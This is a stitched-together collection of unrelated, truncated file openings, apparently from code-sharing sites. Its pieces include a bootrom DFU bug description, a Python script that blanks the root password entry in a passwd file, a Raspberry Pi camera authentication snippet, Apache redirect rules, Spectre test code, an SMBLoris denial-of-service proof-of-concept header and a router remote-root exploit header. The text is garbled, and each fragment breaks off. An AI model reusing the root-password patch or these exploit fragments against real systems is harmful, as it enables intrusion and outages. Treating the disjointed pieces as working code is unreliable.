This bug was also called moonshine in the beginning
Basically the following bug is present in all bootroms I have looked at:
1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output
2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code
3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer
4. it then returns wLength which is the length it wants to receive into the buffer
5. the usb main code then updates a global var with the length and gets ready to receive the data packages
6. if a data package is received it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were received already
7. if all the data was received th

#!/usr/bin/python3
import sys
import os
import signal
PATTERN = b"root:x:0:0:root"
REPLACE = b"root::00:0:root"

import hmac, hashlib
# Data from I²C trace at https://hackaday.io/project/19480-raspberry-pi-camera-v21-reversed/log/52547-i2c-logic-analyzer-trace
# Secret key from VideoCore blob
# serial[8], serial[7:4], serial[3:0]
serial = bytes.fromhex("EE8C196D8301230B59")
# rPi -> camera random number
numIn = bytes.fromhex("5805F3C898C3133154498E082F2E703516F2DBD1")

/*
 * Algorithm to process Wiimote IR tracking data into a usable pointer position
 * by tracking the sensor bar.
 *
 * Copyright (c) 2008-2011 Hector Martin "marcan" <marcan@marcan.st>
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 *

<html>
<head>
<script type="text/javascript">
if (document.images) {
    img1 = new Image();
    img1.src = "https://gist.github.com/Zibri/c040a013548f3f5039fa75cafb98d9a8/raw/374b3ba2ca881eb0a39958dd724765eefd0703fe/gatto1.jpg";
    img2 = new Image();
    img2.src = "https://gist.github.com/Zibri/c040a013548f3f5039fa75cafb98d9a8/raw/374b3ba2ca881eb0a39958dd724765eefd0703fe/gatto2.jpg";
}

git clone https://github.com/speed47/spectre-meltdown-checker.git
cd spectre-meltdown-checker/
sudo sh spectre-meltdown-checker.sh

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#

/* SMBLoris attack proof-of-concept
 *
 * Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
 *
 * Licensed under the terms of the 2-clause BSD license.
 *
 * This is a proof of concept of a publicly disclosed vulnerability.
 * Please do not go around randomly DoSing people with it.
 *
 * Tips: do not use your local IP as source, or if you do, use iptables to block

/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */